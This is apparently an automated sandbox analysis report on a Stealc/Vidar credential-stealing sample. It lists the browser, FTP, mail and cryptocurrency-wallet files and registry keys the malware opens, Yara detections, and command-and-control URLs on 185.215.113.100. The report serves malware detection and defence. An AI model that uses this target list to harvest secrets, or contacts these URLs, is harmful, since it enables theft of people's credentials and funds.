Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\*.*'
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 5320, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 5320, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 5320, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1501501 Sample: file.exe Startdate: 30/08/2024 Architecture: WINDOWS Score: 100 20 Suricata IDS alerts for network traffic 2->20 22 Found malware configuration 2->22 24 Antivirus detection for URL or domain 2->24 26 10 other signatures 2->26 5 file.exe 34 2->5         started        process3 dnsIp4 18 185.215.113.100, 49704, 80 WHOLESALECONNECTIONSNL Portugal 5->18 10 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 5->10 dropped 12 C:\Users\user\AppData\...\softokn3[1].dll, PE32 5->12 dropped 14 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 5->14 dropped 16 9 other files (none is malicious) 5->16 dropped 28 Detected unpacking (changes PE section rights) 5->28 30 Tries to detect sandboxes and other dynamic analysis tools (window names) 5->30 32 Tries to steal Mail credentials (via file / registry access) 5->32 34 12 other signatures 5->34 file5 signatures6
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.100
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.100/0d60be0de163924d/vcruntime140.dll true
  • Avira URL Cloud: malware
 unknown
http://185.215.113.100/ true
  • URL Reputation: malware
 unknown
http://185.215.113.100/0d60be0de163924d/mozglue.dll true
  • Avira URL Cloud: malware
 unknown
http://185.215.113.100/e2b1563c6670f193.php true
  • URL Reputation: malware
 unknown
http://185.215.113.100/0d60be0de163924d/softokn3.dll true
  • Avira URL Cloud: malware
 unknown
http://185.215.113.100/0d60be0de163924d/sqlite3.dll true
  • Avira URL Cloud: malware
 unknown
http://185.215.113.100/0d60be0de163924d/freebl3.dll true
  • Avira URL Cloud: malware
 unknown
http://185.215.113.100/0d60be0de163924d/nss3.dll true
  • Avira URL Cloud: malware
 unknown
http://185.215.113.100/0d60be0de163924d/msvcp140.dll true
  • Avira URL Cloud: malware
 unknown
185.215.113.100/e2b1563c6670f193.php true
  • Avira URL Cloud: malware
 unknown